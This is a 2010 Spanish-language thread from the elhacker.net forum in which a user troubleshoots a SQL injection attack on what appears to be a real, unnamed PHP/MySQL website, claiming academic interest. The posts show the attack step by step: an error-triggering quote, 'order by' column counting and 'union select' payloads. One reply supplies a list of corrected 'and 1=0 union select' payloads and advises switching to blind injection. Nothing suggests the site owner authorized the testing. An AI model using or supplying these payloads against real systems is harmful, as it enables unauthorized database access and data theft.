elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  respuesta contradicotria en sql injection		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: respuesta contradicotria en sql injection  (Leído 2,102 veces)
sapito169


Desconectado Desconectado

Mensajes: 628



Ver Perfil
respuesta contradicotria en sql injection
« en: 5 Septiembre 2010, 05:36 am »
hola foreros
estoy tratando de obtener información de una pagina vulnerable(no me gusta hacer maldades solo es un interés académico)
bien reconocí que la pagina es vulnerable por que al ponerle en el url

Código:
xxxxxxx.php?id='
me voto de resultado

Citar
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' AND active = 'T'' at line 1

con lo cual ya se que es mysql con php y ademas me pasa un pedaso del query y que es vulnerable

luego al tratar de averiguar cuantas columnas vota la consulta puse

xxxxxxx.php?id=4 order by 10/*

me voto error pero con 9 no con lo que averigüe que tiene 9 columnas

acá viene lo extraño cuando trato de sacar mas información usando union

Código:
xxxxxxx.php?id=4 union all select 1,2,3,4,5,6,7,8,9/*

me vota esta respuesta contradictoria
Citar
The used SELECT statements have a different number of columns
En línea
OzX


Desconectado Desconectado

Mensajes: 406

[NuKe] Team


Ver Perfil WWW
Re: respuesta contradicotria en sql injection
« Respuesta #1 en: 8 Septiembre 2010, 00:04 am »
Lo que YO ejecutaría seria.

4+and+1=0+union+select+all+1+--+
4+and+1=0+union+select+all+1,2+--+
4+and+1=0+union+select+all+1,2,3+--+
4+and+1=0+union+select+all+1,2,3,4+--+
4+and+1=0+union+select+all+1,2,3,4,5+--+
4+and+1=0+union+select+all+1,2,3,4,5,6+--+
4+and+1=0+union+select+all+1,2,3,4,5,6,7+--+
4+and+1=0+union+select+all+1,2,3,4,5,6,7,8+--+
4+and+1=0+union+select+all+1,2,3,4,5,6,7,8,9+--+
4+and+1=0+union+select+all+1,2,3,4,5,6,7,8,9,10...N+--+


Muchas veces 1 variable via GET es tomada por 2 funciones distintas en la misma web.
Me explico.
Aveces la pagina hace 2 consultas en donde la segunda depende de la primera. es por ello que aveces te tira ese error, siendo que realmente no es la cantidad de campos original en la consulta si no mas bien es de la segunda consulta.

Cambia el /* por el +--+, por cada intento aveces por ese maldito detalle es que no deja generar bien la consulta.


En el Caso que no te muestre nada, explotalo bien blind.

SAludos.
En línea
Undersecurity.net
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: respuesta contradicotria en sql injection
« Respuesta #2 en: 8 Septiembre 2010, 00:10 am »
eso sucede cuando tienes una cantidad de columnas diferentes a las columnas devueltas, por eso la cantidad de columnas te resulta 9 pero realmente la query completa debuelve otra cantidad
En línea
- https://yhojann.cl/ - https://whk.cl/
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines